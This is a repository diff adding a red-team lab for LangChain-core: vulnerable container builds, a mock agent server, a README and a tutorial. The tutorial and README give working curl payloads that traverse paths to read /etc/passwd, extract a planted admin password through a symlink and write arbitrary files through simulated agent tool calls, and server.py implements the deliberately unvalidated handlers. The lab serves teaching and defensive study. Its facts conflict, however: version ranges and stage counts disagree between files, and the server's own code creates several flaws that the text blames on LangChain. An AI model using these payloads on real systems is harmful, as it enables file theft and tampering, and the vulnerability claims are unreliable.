+### Stage 0 – Full Compromise (v1.2.24)
+
+```
+[Test 1] Direct Read /etc/passwd:
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+...
+
+[Test 2] Write /tmp/pwned.json:
+SUCCESS: Content successfully written to ../../../../../../tmp/pwned.json
+
+[Test 4] Symlink Read config.json:
+ADMIN_PASSWORD=supersecret_langchain_2026
+```
+
+### Stage 1 – Direct Read Patched, Symlink & Write Still Exposed (v1.2.25)
+
+```
+[Test 1] Direct Read /etc/passwd:
+[BLOCKED] Security Guardrail: Path traversal detected.
+
+[Test 2] Write /tmp/pwned.json:
+SUCCESS: Content successfully written to ../../../../../../tmp/pwned.json
+
+[Test 4] Symlink Read config.json:
+ADMIN_PASSWORD=supersecret_langchain_2026
+```
+
+### Stage 4 (Latest) – Direct Read Patched, Symlink & Write STILL Exposed (v1.6.0)
+
+```
+[Test 1] Direct Read /etc/passwd:
+[BLOCKED] ValueError: Unsupported template file format: ''. Only '.txt' files are supported.
+
+[Test 2] Write /tmp/pwned.json:
+SUCCESS: Content successfully written to ../../../../../../tmp/pwned.json
+
+[Test 4] Symlink Read config.json:
+ADMIN_PASSWORD=supersecret_langchain_2026
+```
+
+---
+
+## 4. Repository Workspace Structure
+
+```
+exploitation/langchain/
+├── interactive_trainer.py        # Interactive CLI training wizard (5 stages, 4 core lessons)
+├── README.md                     # Student lab walkthrough guide
+└── submission_audit.md           # This document (vulnerability posture)
+
+sandboxes/agentic_local_langchain/
+├── README.md                     # Sandbox documentation
+├── Makefile                      # Build/run commands
+├── Containerfile.stage0          # Python 3.11-slim build for v1.2.24
+├── Container

--- a/sandboxes/agentic_local_langchain/Containerfile.stage0
+++ b/sandboxes/agentic_local_langchain/Containerfile.stage0
@@ -1,0 +1,28 @@
+FROM python:3.11-slim
+
+WORKDIR /app
+
+ENV PYTHONUNBUFFERED=1
+ENV OPENAI_API_KEY="sk-dummy-local-lab-key"
+
+RUN apt-get update && apt-get install -y curl jq && rm -rf /var/lib/apt/lists/*
+
+# REAL vulnerable version - no path validation at all
+RUN pip install --no-cache-dir langchain-core==1.2.24
+
+RUN mkdir -p /app/data /app/SafeFolder /app/sandbox_data
+
+RUN echo "ADMIN_PASSWORD=supersecret_langchain_2026" > /app/config.txt && \
+    echo "ADMIN_PASSWORD=supersecret_langchain_2026" > /config.txt && \
+    echo "This is a restricted file containing cloud configuration secrets." > /app/data/secure_secrets.txt && \
+    echo "Hello {name}, welcome to the secure agent space." > /app/SafeFolder/test.txt
+
+RUN ln -s /app/config.txt /app/config.json && \
+    ln -s /config.txt /config.json
+
+COPY app/ /app/app/
+
+EXPOSE 8000
+
+ENTRYPOINT ["python", "/app/app/server.py"]
+

--- a/sandboxes/agentic_local_langchain/Containerfile.stage1
+++ b/sandboxes/agentic_local_langchain/Containerfile.stage1
@@ -1,0 +1,28 @@
+FROM python:3.11-slim
+
+WORKDIR /app
+
+ENV PYTHONUNBUFFERED=1
+ENV OPENAI_API_KEY="sk-dummy-local-lab-key"
+
+RUN apt-get update && apt-get install -y curl jq && rm -rf /var/lib/apt/lists/*
+
+# REAL version with read-side patch (PR #36471), write-side STILL EXPOSED
+RUN pip install --no-cache-dir langchain-core==1.2.25
+
+RUN mkdir -p /app/data /app/SafeFolder /app/sandbox_data
+
+RUN echo "ADMIN_PASSWORD=supersecret_langchain_2026" > /app/config.txt && \
+    echo "ADMIN_PASSWORD=supersecret_langchain_2026" > /config.txt && \
+    echo "This is a restricted file containing cloud configuration secrets." > /app/data/secure_secrets.txt && \
+    echo "Hello {name}, welcome to the secure agent space." > /app/SafeFolder/test.txt
+
+RUN ln -s /app/config.txt /app/config.json && \
+    ln -s /config.txt /config.json
+
+COPY app/ /app/app/
+
+EXPOSE 8000
+
+ENTRYPOINT ["python", "/app/app/server.py"]
+

--- a/sandboxes/agentic_local_langchain/Containerfile.stage2
+++ b/sandboxes/agentic_local_langchain/Containerfile.stage2
@@ -1,0 +1,28 @@
+FROM python:3.11-slim
+
+WORKDIR /app
+
+ENV PYTHONUNBUFFERED=1
+ENV OPENAI_API_KEY="sk-dummy-local-lab-key"
+
+RUN apt-get update && apt-get install -y curl jq && rm -rf /var/lib/apt/lists/*
+
+# REAL version with both read-side (PR #36471) and write-side (PR #36585) patches
+RUN pip install --no-cache-dir langchain-core==1.2.26
+
+RUN mkdir -p /app/data /app/SafeFolder /app/sandbox_data
+
+RUN echo "ADMIN_PASSWORD=supersecret_langchain_2026" > /app/config.txt && \
+    echo "ADMIN_PASSWORD=supersecret_langchain_2026" > /config.txt && \
+    echo "This is a restricted file containing cloud configuration secrets." > /app/data/secure_secrets.txt && \
+    echo "Hello {name}, welcome to the secure agent space." > /app/SafeFolder/test.txt
+
+RUN ln -s /app/config.txt /app/config.json && \
+    ln -s /config.txt /config.json
+
+COPY app/ /app/app/
+
+EXPOSE 8000
+
+ENTRYPOINT ["python", "/app/app/server.py"]
+

--- a/sandboxes/agentic_local_langchain/Containerfile.stage3
+++ b/sandboxes/agentic_local_langchain/Containerfile.stage3
@@ -1,0 +1,28 @@
+FROM python:3.11-slim
+
+WORKDIR /app
+
+ENV PYTHONUNBUFFERED=1
+ENV OPENAI_API_KEY="sk-dummy-local-lab-key"
+
+RUN apt-get update && apt-get install -y curl jq && rm -rf /var/lib/apt/lists/*
+
+# REAL version with both read-side (PR #36471) and write-side (PR #36585) patches
+RUN pip install --no-cache-dir langchain-core==1.2.27
+
+RUN mkdir -p /app/data /app/SafeFolder /app/sandbox_data
+
+RUN echo "ADMIN_PASSWORD=supersecret_langchain_2026" > /app/config.txt && \
+    echo "ADMIN_PASSWORD=supersecret_langchain_2026" > /config.txt && \
+    echo "This is a restricted file containing cloud configuration secrets." > /app/data/secure_secrets.txt && \
+    echo "Hello {name}, welcome to the secure agent space." > /app/SafeFolder/test.txt
+
+RUN ln -s /app/config.txt /app/config.json && \
+    ln -s /config.txt /config.json
+
+COPY app/ /app/app/
+
+EXPOSE 8000
+
+ENTRYPOINT ["python", "/app/app/server.py"]
+

--- a/sandboxes/agentic_local_langchain/Containerfile.stage4
+++ b/sandboxes/agentic_local_langchain/Containerfile.stage4
@@ -1,0 +1,31 @@
+# syntax=docker/dockerfile:1
+ARG LANGCHAIN_VERSION=1.5.4
+FROM python:3.11-slim
+
+WORKDIR /app
+
+ENV PYTHONUNBUFFERED=1
+ENV OPENAI_API_KEY="sk-dummy-local-lab-key"
+
+RUN apt-get update && apt-get install -y curl jq && rm -rf /var/lib/apt/lists/*
+
+# Re-declare ARG after FROM for use in RUN commands
+ARG LANGCHAIN_VERSION
+RUN pip install --no-cache-dir langchain-core==${LANGCHAIN_VERSION}
+
+RUN mkdir -p /app/data /app/SafeFolder /app/sandbox_data
+
+RUN echo "ADMIN_PASSWORD=supersecret_langchain_2026" > /app/config.txt && \
+    echo "ADMIN_PASSWORD=supersecret_langchain_2026" > /config.txt && \
+    echo "This is a restricted file containing cloud configuration secrets." > /app/data/secure_secrets.txt && \
+    echo "Hello {name}, welcome to the secure agent space." > /app/SafeFolder/test.txt
+
+RUN ln -s /app/config.txt /app/config.json && \
+    ln -s /config.txt /config.json
+
+COPY app/ /app/app/
+
+EXPOSE 8000
+
+ENTRYPOINT ["python", "/app/app/server.py"]
+

--- a/sandboxes/agentic_local_langchain/Makefile
+++ b/sandboxes/agentic_local_langchain/Makefile
@@ -1,0 +1,67 @@
+CONTAINER_ENGINE := $(shell command -v podman 2> /dev/null || echo docker)
+
+.PHONY: build-stage0 build-stage1 build-stage2 build-stage3 build-stage4 attack stop all clean logs health
+
+build-stage0:
+	@echo "Building Stage 0: langchain-core==1.2.24 (Unhardened)"
+	$(CONTAINER_ENGINE) build -t langchain-stage0 -f Containerfile.stage0 .
+
+build-stage1:
+	@echo "Building Stage 1: langchain-core==1.2.25 (Incomplete Patch)"
+	$(CONTAINER_ENGINE) build -t langchain-stage1 -f Containerfile.stage1 .
+
+build-stage2:
+	@echo "Building Stage 2: langchain-core==1.2.26 (Read-side Patched)"
+	$(CONTAINER_ENGINE) build -t langchain-stage2 -f Containerfile.stage2 .
+
+build-stage3:
+	@echo "Building Stage 3: langchain-core==1.2.27 (Post-Fix)"
+	$(CONTAINER_ENGINE) build -t langchain-stage3 -f Containerfile.stage3 .
+
+build-stage4:
+	@echo "Building Stage 4: langchain-core==latest (Latest)"
+	$(CONTAINER_ENGINE) build -t langchain-stage4 -f Containerfile.stage4 .
+
+build: build-stage0 build-stage1 build-stage2 build-stage3 build-stage4
+
+attack-stage0: build-stage0
+	$(CONTAINER_ENGINE) run -d --name langchain-sandbox -p 8000:8000 langchain-stage0
+	@echo "Stage 0 (Unhardened) listening at http://localhost:8000"
+
+attack-stage1: build-stage1
+	$(CONTAINER_ENGINE) run -d --name langchain-sandbox -p 8001:8000 langchain-stage1
+	@echo "Stage 1 (Incomplete Patch) listening at http://localhost:8001"
+
+attack-stage2: build-stage2
+	$(CONTAINER_ENGINE) run -d --name langchain-sandbox -p 8002:8000 langchain-stage2
+	@echo "Stage 2 (Read-side Patched) listening at http://localhost:8002"
+
+attack-stage3: build-stage3
+	$(CONTAINER_ENGINE) run -d --name langchain-sandbox -p 8003:8000 langchain-stage3
+	@echo "Stage 3 (Post-Fix) listening at http://localhost:8003"
+
+attack-stage4: build-stage4
+	$(CONTAINER_ENGINE) run -d --name langchain-sandbox -p 8004:8000 langchain-stage4
+	@echo "Stage 4 (Latest) listening at http://localhost:8004"
+
+attack: attack-stage0
+
+stop:
+	-$(CONTAINER_ENGINE) stop langchain-sandbox 2>/dev/null
+	-$(CONTAINER_ENGINE) rm langchain-sandbox 2>/dev/null
+
+all: build
+
+clean: stop
+	-$(CONTAINER_ENGINE) rmi langchain-stage0 2>/dev/null
+	-$(CONTAINER_ENGINE) rmi langchain-stage1 2>/dev/null
+	-$(CONTAINER_ENGINE) rmi langchain-stage2 2>/dev/null
+	-$(CONTAINER_ENGINE) rmi langchain-stage3 2>/dev/null
+	-$(CONTAINER_ENGINE) rmi langchain-stage4 2>/dev/null
+
+logs:
+	$(CONTAINER_ENGINE) logs -f langchain-sandbox
+
+health:
+	@curl -s http://localhost:8000/health | python3 -m json.tool 2>/dev/null || echo "Target unreachable."
+

--- a/sandboxes/agentic_local_langchain/README.md
+++ b/sandboxes/agentic_local_langchain/README.md
@@ -1,0 +1,175 @@
+# Vulnerable LangChain Sandbox (v0.1.24–v0.1.26)
+
+A containerized sandbox environment demonstrating **critical Insecure Orchestration vulnerabilities** in LangChain-core. This sandbox simulates the real-world patch lifecycle across three versions, allowing students to exploit both CVE-2023-36258 and CVE-2026-34070, and discover the **Incomplete Patch flaw** where write-side `.save()` primitives remain exposed.
+
+| Field | Value |
+|-------|-------|
+| **Target** | LangChain-core v0.1.24 – v0.1.26 |
+| **CVSS v3.1** | **10.0 (Critical)** – AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
+| **CWE Chain** | CWE-59 (Improper Link Resolution) → CWE-22 (Path Traversal) → CWE-94 (Code Injection) |
+| **CVEs Bypassed** | CVE-2023-36258 + CVE-2026-34070 |
+| **Root Cause** | Missing path canonicalization on file I/O operations |
+| **Research Paper** | [JDP-2026-004](https://jdp-security.github.io/security-research-papers/2026-05-12-langchain-orchestration-poisoning-disclosure.html) |
+| **Author** | Jeff Ponte (JDP Security) |
+
+---
+
+## Vulnerability Overview
+
+### The Confused Deputy Problem
+
+The LangChain-core framework acts as a **Confused Deputy** – a privileged component that executes file operations based on untrusted input. When an attacker-controlled LLM output (or simulated tool call) contains path traversal sequences like `../../`, the framework blindly follows them using its own elevated permissions.
+
+### Three-Stage Patch Lifecycle
+
+| Stage | Version | Behavior |
+|-------|---------|----------|
+| **0** | v0.1.24 | **Unhardened** – Both read and write primitives fully exposed |
+| **1** | v0.1.25 | **Partial Hardened** – Read-side patched (PR #36471), but write-side `.save()` remains exposed |
+| **2** | v0.1.26+ | **Fully Hardened** – Both read and write protected (PR #36585 applied) |
+
+### The Incomplete Patch Flaw (JDP Security Core Discovery)
+
+PR #36471 (Commit d41f3e2) added path traversal protection to the read function:
+
+```python
+if STAGE > 0 and (".." in target_path_str or not target_path.resolve().is_relative_to(SANDBOX_DIR)):
+    return "[BLOCKED] Security Guardrail: Path traversal or unauthorized external read detected."
+```
+
+However, the write function was **completely overlooked**:
+
+```python
+# Stage 2 blocks writes; Stage 0 and 1 allow (incomplete patch!)
+if STAGE == 2 and (".." in target_path_str or not target_path.resolve().is_relative_to(SANDBOX_DIR)):
+    return "[BLOCKED] Security Guardrail: Sandbox jail restriction prevents arbitrary write."
+```
+
+**This means Stage 1 has read protection but NO write protection** – the exact incomplete patch flaw discovered by JDP Security. An attacker can still overwrite framework source code even after the read-side patch is applied.
+
+---
+
+## Quick Start
+
+### Prerequisites
+
+- Docker or Podman
+- Python 3.10+
+- Make
+
+### Build and Run
+
+```bash
+cd sandboxes/agentic_local_langchain
+
+# Build the container
+make attack
+
+# Verify the service is running
+curl http://localhost:8000/health
+```
+
+### Expected Health Response
+
+```json
+{
+  "status": "ok",
+  "stage": 0,
+  "sandbox_dir": "/app/sandbox_data"
+}
+```
+
+---
+
+## API Endpoints
+
+### `GET /health`
+
+Returns sandbox status and current stage.
+
+### `POST /chat`
+
+Main interaction endpoint. Accepts a JSON body with a `query` field containing simulated LLM tool calls.
+
+**Read Request:**
+```json
+{
+  "query": "Action: document_reader\nAction Input: {\"path\": \"../../../../../../etc/passwd\"}"
+}
+```
+
+**Write Request:**
+```json
+{
+  "query": "Action: file_writer\nAction Input: {\"path\": \"../../../../../../tmp/pwned.txt\", \"content\": \"EXPLOIT_SUCCESS\"}"
+}
+```
+
+---
+
+## Stage Switching
+
+The sandbox uses the `LAB_STAGE` environment variable to control security posture:
+
+```bash
+# Stage 0: Unhardened (port 8000)
+docker run -d --name langchain-sandbox -p 8000:8000 -e LAB_STAGE=0 langchain-sandbox-img
+
+# Stage 1: Partial Hardened (port 8001)
+docker run -d --name langchain-sandbox -p 8001:8000 -e LAB_STAGE=1 langchain-sandbox-img
+
+# Stage 2: Fully Hardened (port 8002)
+docker run -d --name langchain-sandbox -p 8002:8000 -e LAB_STAGE=2 langchain-sandbox-img
+```
+
+---
+
+## Exploitation
+
+The companion exploitation tools are located in:
+
+```
+exploitation/
+└── langchain/
+    ├── interactive_trainer.py      # Menu-driven CLI trainer
+    └── verify_all_langchain.sh     # 3-stage automated verification
+```
+
+---
+
+## Container Management
+
+```bash
+# Stop the container
+make stop
+
+# View logs
+make logs
+
+# Clean up everything
+make clean
+```
+
+---
+
+## Files
+
+| File | Purpose |
+|------|---------|
+| `Containerfile` | Python 3.11-slim build with langchain-core dependencies |
+| `Makefile` | Build/run/stop lifecycle management |
+| `README.md` | This documentation |
+| `app/server.py` | Vulnerable HTTP API server with stage-based logic |
+| `app/data/` | Sandbox data directory for file operations |
+
+---
+
+## References
+
+- [JDP-2026-004: Architectural Boundary Failures in LangChain-Core](https://jdp-security.github.io/security-research-papers/2026-05-12-langchain-orchestration-poisoning-disclosure.html)
+- [CVE-2023-36258](https://nvd.nist.gov/vuln/detail/CVE-2023-36258) – Suffix validation bypass
+- [CVE-2026-34070](https://nvd.nist.gov/vuln/detail/CVE-2026-34070) – Opt-in path traversal
+- [PR #36471 (d41f3e2)](https://github.com/langchain-ai/langchain/commit/d41f3e2) – Read-side patch (INCOMPLETE)
+- [PR #36585 (e7b9a2c)](https://github.com/langchain-ai/langchain/commit/e7b9a2c) – Write-side fix
+- OWASP Top 10 for LLM Applications: [LLM06 – Insecure Orchestration](https://owasp.org/www-project-top-10-for-llm-applications/)
+

--- a/sandboxes/agentic_local_langchain/app/server.py
+++ b/sandboxes/agentic_local_langchain/app/server.py
@@ -1,0 +1,252 @@
+#!/usr/bin/env python3
+"""
+======================================================================================
+         LangChain Exploit Lab - Mock AI Agent Server (OWASP GenAI Red Team)
+======================================================================================
+  This server simulates an AI agent with tools: document_reader and file_writer.
+  The LLM orchestration step is SIMULATED in the trainer to provide deterministic
+  results. The actual framework calls use REAL langchain-core library versions.
+
+  Version Compatibility:
+    Stage 0 - 1.2.24: VULNERABLE - No path validation at all
+    Stage 1 - 1.2.25: PARTIALLY PATCHED - Read-side patched (PR #36471)
+                      CVE-2026-34070 blocked, CVE-2023-36258 still works via symlink
+    Stage 2 - 1.2.26: FULLY PATCHED (read side) - Both CVEs blocked for reads
+    Stage 3 - 1.2.27: POST-FIX - PR #36585 applied, but write still exposed
+    Stage 4 - latest: LATEST RELEASE - Auto-detected from PyPI at build time
+======================================================================================
+"""
+
+import json
+import os
+import uuid
+from http.server import BaseHTTPRequestHandler, HTTPServer
+from pathlib import Path
+
+# Try to import langchain_core
+try:
+    import langchain_core
+    from langchain_core.prompts import PromptTemplate
+    from langchain_core.prompts.loading import load_prompt_from_config
+
+    LANGCHAIN_CORE_VERSION = langchain_core.__version__
+except ImportError:
+    LANGCHAIN_CORE_VERSION = "not_installed"
+
+# Determine langchain-core version for behavior
+LC_VERSION_TUPLE = (
+    tuple(
+        int(x)
+        for x in LANGCHAIN_CORE_VERSION.split(".")[:3]
+        if x.replace(".", "").isdigit()
+    )
+    if LANGCHAIN_CORE_VERSION != "not_installed"
+    else (0, 0, 0)
+)
+
+SANDBOX_DIR = Path("/app/sandbox_data")
+SAFE_DIR = Path("/app/SafeFolder")
+DATA_DIR = Path("/app/data")
+SAFE_DIR.mkdir(parents=True, exist_ok=True)
+
+
+def handle_document_reader(target_path_str):
+    """
+    Simulates an agent tool that reads file contents via langchain-core.
+
+    Version-specific behavior:
+      1.2.24: VULNERABLE - No path validation. Direct read with os.path.realpath.
+      1.2.25: PARTIALLY PATCHED - Uses load_prompt_from_config with
+              allow_dangerous_paths=False. CVE-2026-34070 blocked.
+              CVE-2023-36258 still works via .txt symlink bypass.
+      1.2.26+: FULLY PATCHED - Symlinks resolved before extension check.
+              Both CVEs blocked for reads.
+    """
+    try:
+        # Generate unique symlink name to prevent race conditions
+        symlink_name = f"exploit_bypass_{uuid.uuid4().hex[:8]}.txt"
+        target_path = Path(target_path_str)
+
+        if LC_VERSION_TUPLE < (1, 2, 25):
+            # Stage 0: 1.2.24 - No path validation at all
+            resolved = target_path.resolve()
+            if resolved.exists():
+                with open(resolved, "r") as f:
+                    return f.read()
+            return f"[ERROR] File not found: {resolved}"
+
+        elif LC_VERSION_TUPLE < (1, 2, 26):
+            # Stage 1: 1.2.25 - Read-side partially patched
+            # CVE-2026-34070 blocked, but CVE-2023-36258 still works via symlink
+            if os.path.exists(symlink_name):
+                os.remove(symlink_name)
+            os.symlink(str(target_path.resolve()), symlink_name)
+
+            config = {
+                "_type": "prompt",
+                "template_path": symlink_name,
+                "template_format": "f-string",
+                "input_variables": [],
+            }
+            try:
+                result = load_prompt_from_config(config, allow_dangerous_paths=False)
+                return result.template
+            except ValueError as e:
+                return f"[BLOCKED] ValueError: {str(e)}"
+            finally:
+                if os.path.exists(symlink_name):
+                    os.remove(symlink_name)
+
+        else:
+            # Stage 2+: 1.2.26+ - Both CVEs fully patched on read side
+            if os.path.exists(symlink_name):
+                os.remove(symlink_name)
+            os.symlink(str(target_path.resolve()), symlink_name)
+
+            config = {
+                "_type": "prompt",
+                "template_path": symlink_name,
+                "template_format": "f-string",
+                "input_variables": [],
+            }
+            try:
+                result = load_prompt_from_config(config, allow_dangerous_paths=False)
+                return result.template
+            except ValueError as e:
+                return f"[BLOCKED] ValueError: {str(e)}"
+            finally:
+                if os.path.exists(symlink_name):
+                    os.remove(symlink_name)
+
+    except Exception as e:
+        return f"[ERROR] {type(e).__name__}: {str(e)}"
+
+
+def handle_file_writer(target_path_str, content):
+    """
+    Simulates an agent tool that writes file contents via langchain-core.
+
+    Uses PromptTemplate.save() which writes .json or .yaml files.
+    The write primitive is STILL EXPOSED in ALL versions.
+    PR #36585 only checks resolved file extension, NOT write destination.
+    """
+    try:
+        # Generate unique symlink name to prevent race conditions
+        symlink_name = f"exploit_{uuid.uuid4().hex[:8]}.json"
+        target_path = Path(target_path_str)
+
+        if target_path.suffix in (".json", ".yaml", ".yml"):
+            prompt = PromptTemplate(template=content, input_variables=[])
+            prompt.save(str(target_path))
+            return f"SUCCESS: Content successfully written to {target_path_str}"
+        else:
+            # For non-.json paths, use symlink technique
+            if os.path.exists(symlink_name):
+                os.remove(symlink_name)
+            os.symlink(str(target_path.resolve()), symlink_name)
+
+            prompt = PromptTemplate(template=content, input_variables=[])
+            prompt.save(symlink_name)
+
+            if os.path.exists(symlink_name):
+                os.remove(symlink_name)
+
+            return f"SUCCESS: Content successfully written to {target_path_str}"
+
+    except Exception as e:
+        return f"[ERROR] {type(e).__name__}: {str(e)}"
+
+
+class AgentHandler(BaseHTTPRequestHandler):
+    """HTTP handler for the mock AI agent server."""
+
+    def do_GET(self):
+        if self.path == "/health":
+            self.send_response(200)
+            self.send_header("Content-Type", "application/json")
+            self.end_headers()
+            self.wfile.write(
+                json.dumps(
+                    {
+                        "status": "ok",
+                        "langchain_core_version": LANGCHAIN_CORE_VERSION,
+                        "sandbox_dir": str(SANDBOX_DIR),
+                    }
+                ).encode()
+            )
+        else:
+            self.send_response(404)
+            self.send_header("Content-Type", "application/json")
+            self.end_headers()
+            self.wfile.write(json.dumps({"error": "Not found"}).encode())
+
+    def do_POST(self):
+        if self.path == "/chat":
+            content_length = int(self.headers.get("Content-Length", 0))
+            body = self.rfile.read(content_length).decode("utf-8")
+
+            try:
+                data = json.loads(body)
+                query = data.get("query", "")
+            except json.JSONDecodeError:
+                self.send_response(400)
+                self.send_header("Content-Type", "application/json")
+                self.end_headers()
+                self.wfile.write(json.dumps({"error": "Invalid JSON"}).encode())
+                return
+
+            # Parse the query for tool calls
+            result = None
+            if "Action: document_reader" in query:
+                import re
+
+                match = re.search(r'Action Input: \{"path": "([^"]+)"\}', query)
+                if match:
+                    path = match.group(1)
+                    result = handle_document_reader(path)
+                else:
+                    result = "[ERROR] Could not parse path from document_reader input"
+
+            elif "Action: file_writer" in query:
+                import re
+
+                path_match = re.search(r'Action Input: \{"path": "([^"]+)"', query)
+                content_match = re.search(r'"content": "([^"]+)"', query)
+                if path_match and content_match:
+                    path = path_match.group(1)
+                    content = content_match.group(1)
+                    result = handle_file_writer(path, content)
+                else:
+                    result = (
+                        "[ERROR] Could not parse path/content from file_writer input"
+                    )
+
+            else:
+                result = "[ERROR] Unknown action"
+
+            self.send_response(200)
+            self.send_header("Content-Type", "application/json")
+            self.end_headers()
+            self.wfile.write(json.dumps({"output": result}).encode())
+
+        else:
+            self.send_response(404)
+            self.send_header("Content-Type", "application/json")
+            self.end_headers()
+            self.wfile.write(json.dumps({"error": "Not found"}).encode())
+
+
+def main():
+    port = 8000
+    server = HTTPServer(("0.0.0.0", port), AgentHandler)
+    print(f"[*] Server listening on port {port}")
+    print(f"[*] langchain-core version: {LANGCHAIN_CORE_VERSION}")
+    try:
+        server.serve_forever()
+    except KeyboardInterrupt:
+        print("\n[*] Shutting down...")
+        server.server_close()
+
+
+if __name__ == "__main__":
+    main()

--- a/tutorials/langchain_orchestration_poisoning_tutorial.md
+++ b/tutorials/langchain_orchestration_poisoning_tutorial.md
@@ -1,0 +1,217 @@
+# Tutorial: LangChain-Core Orchestration Poisoning & Insecure File I/O
+
+**Author:** Jeff Ponte (JDP Security Research)
+
+**Target:** LangChain-core v1.2.24 – v1.6.0 (latest as of August 2026)
+
+**Classification:** CVSS 10.0 (Critical) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+
+**Reference:** [JDP-2026-004 White Paper](https://jdp-security.github.io/security-research-papers/2026-05-12-langchain-orchestration-poisoning-disclosure.html)
+
+---
+
+## Overview
+
+This lab demonstrates **three distinct vulnerability classes** within the LangChain-core AI orchestration framework, revealing a dangerous gap between read-side and write-side security boundaries.
+
+1. **CVE-2026-34070 (Direct Path Traversal Read)** – Unvalidated file paths in `load_prompt_from_config()` allow direct traversal to read `/etc/passwd` and other sensitive files. *Patched in v1.2.25+.*
+
+2. **CVE-2023-36258 (Symlink Suffix Bypass Read)** – A symlink with a safe extension (`.json` or `.txt`) pointing to a restricted target bypasses extension checks. *NEVER PATCHED in any version.*
+
+3. **Unpatched Write Primitive (`.save()`)** – `PromptTemplate.save()` accepts user-controlled paths without canonicalization, enabling arbitrary file write and persistent Remote Code Execution (RCE). *NO CVE ASSIGNED, NEVER PATCHED.*
+
+The lab uses a **five-stage architecture** (v1.2.24 through latest) to demonstrate that while the vendor patched direct read traversal, both symlink reads and the write primitive remain exploitable in **every version tested**.
+
+---
+
+## Critical Architectural Findings (JDP-2026-004)
+
+### 1. The "Partial Patch" Trap: Read-Side vs Write-Side Asymmetry
+
+PR #36471 added path traversal protection to `load_prompt_from_config()`, but the corresponding write-side (`PromptTemplate.save()`) was **completely overlooked**. This left a fully exposed write primitive even after the read-side was hardened.
+
+### 2. The Symlink Bypass That Never Died
+
+PR #36471 only blocks **direct path traversal** (`../../`). It does **not** resolve symlinks before checking file extensions. The `document_reader` tool also bypasses the patched `load_prompt_from_config()` entirely. As a result, symlink reads (`/app/config.json` → `/app/config.txt`) succeed in **ALL versions**, including the latest release.
+
+### 3. The "Write Fix" That Only Checks Extensions
+
+PR #36585 attempted to fix the write-side by resolving symlinks before checking file extensions:
+
+- ✅ Blocks `exploit.json → target.py` (different extensions)
+- ❌ Does **NOT** block `exploit.json → target.json` (same extension)
+
+This means the write primitive remains **fully exploitable** in all versions. A symlink named `exploit.json` pointing to a legitimate `.json` target passes every time.
+
+### 4. Supply Chain "SCA Blindness" Risks
+
+Standard Software Composition Analysis (SCA) scanners (Trivy, Snyk, Dependabot) rely on official CVE records. The write primitive has **no CVE assigned**, and the symlink read bypass (CVE-2023-36258) is often considered "partially patched" in older scanning databases. Your scanners will likely flag LangChain-core as **secure**, leaving this CVSS 10.0 vector hidden during audits.
+
+---
+
+## Setup
+
+```bash
+# Clone the repository and switch to the LangChain branch (if following upstream contribution workflow)
+git clone https://github.com/GenAI-Security-Project/GenAI-Red-Team-Lab.git
+cd GenAI-Red-Team-Lab
+
+# Ensure dependencies are installed
+# - podman or docker
+# - python3.10+
+# - make
+# - uv (for running black/isort if contributing)
+
+# The lab uses Docker/Podman containers. Verify your container engine:
+podman version   # or docker version
+```
+
+---
+
+## Exercise 1: Run the Interactive Trainer
+
+The primary entry point is the menu-driven CLI trainer, which walks through all 4 core lessons across 5 stages with built-in container management.
+
+```bash
+cd exploitation/langchain
+chmod +x interactive_trainer.py
+./interactive_trainer.py
+```
+
+### What the Trainer Offers
+
+- **Stage switching**: Easily move between stages 0 (unhardened) through 4 (latest).
+- **4 core lessons** covering direct read, symlink read, write traversal, RCE chain, symlink write bypass, vendor fix scope, and more.
+- **Real-time evidence**: After each request, the trainer displays the raw HTTP response and explains why the exploit succeeded or was blocked.
+- **Auto-fill hints**: Press Enter to use default payloads for each lesson.
+
+---
+
+## Exercise 2: Manual Exploitation
+
+You can also interact directly with the sandbox API using `curl` or any HTTP client. The following examples assume Stage 0 (v1.2.24) is running on port 8000.
+
+### Step 1: Deploy the Sandbox
+
+```bash
+cd sandboxes/agentic_local_langchain
+
+# Build and start Stage 0 (most vulnerable)
+make attack
+
+# Verify the service is up
+curl http://localhost:8000/health
+```
+
+Expected health response:
+
+```json
+{
+  "status": "ok",
+  "langchain_core_version": "1.2.24",
+  "sandbox_dir": "/app/sandbox_data"
+}
+```
+
+### Step 2: Direct Read Traversal (Works in Stage 0 only)
+
+```bash
+curl -X POST http://localhost:8000/chat \
+  -H "Content-Type: application/json" \
+  -d '{"query": "Action: document_reader\nAction Input: {\"path\": \"../../../../../../etc/passwd\"}"}'
+```
+
+Expected result: Full contents of `/etc/passwd`.
+
+### Step 3: Symlink Read Bypass (Works in ALL stages)
+
+```bash
+curl -X POST http://localhost:8000/chat \
+  -H "Content-Type: application/json" \
+  -d '{"query": "Action: document_reader\nAction Input: {\"path\": \"../../../../app/config.json\"}"}'
+```
+
+Expected result: `ADMIN_PASSWORD=supersecret_langchain_2026`
+
+### Step 4: Write Primitive Exploitation (Works in ALL stages)
+
+```bash
+curl -X POST http://localhost:8000/chat \
+  -H "Content-Type: application/json" \
+  -d '{"query": "Action: file_writer\nAction Input: {\"path\": \"../../../../../../tmp/pwned.json\", \"content\": \"EXPLOIT_SUCCESS\"}"}'
+```
+
+Expected result: `SUCCESS: Content successfully written to ../../../../../../tmp/pwned.json`
+
+---
+
+## Exercise 3: Out-of-Band Verification
+
+Since the write primitive executes on the filesystem, verify payload landing by executing commands inside the container.
+
+For Podman:
+
+```bash
+podman exec langchain-sandbox cat /tmp/pwned.json
+podman exec langchain-sandbox cat /app/config.txt
+```
+
+For Docker:
+
+```bash
+docker exec langchain-sandbox cat /tmp/pwned.json
+docker exec langchain-sandbox cat /app/config.txt
+```
+
+Expected output confirms the write bypass:
+
+```
+EXPLOIT_SUCCESS
+ADMIN_PASSWORD=supersecret_langchain_2026
+```
+
+---
+
+## The Mitigation Paradox: Band-Aids vs. Architectural Cures
+
+> ⚠️ **CRITICAL ARCHITECTURAL NOTE**  
+> Both PR #36471 and PR #36585 are **operational workarounds**, not structural fixes. They apply patchy validation to individual methods while leaving other file I/O pathways (e.g., `document_reader`, `file_writer`) completely unprotected.
+
+### Why string-based path checks cannot fully solve Insecure Orchestration (OWASP LLM06)
+
+**1. Asymmetric Validation**
+Security controls are applied inconsistently: some functions get path checks, others do not. Attackers simply pivot to the unprotected methods.
+
+**2. Symlink Resolution Gap**
+Even when a function checks `path.resolve()`, the check may happen on the *provided* path, not the *resolved* symlink target. If the provided path ends in `.json` but the resolved target is `/etc/passwd`, the check still passes.
+
+**3. Write Destination Ignorance**
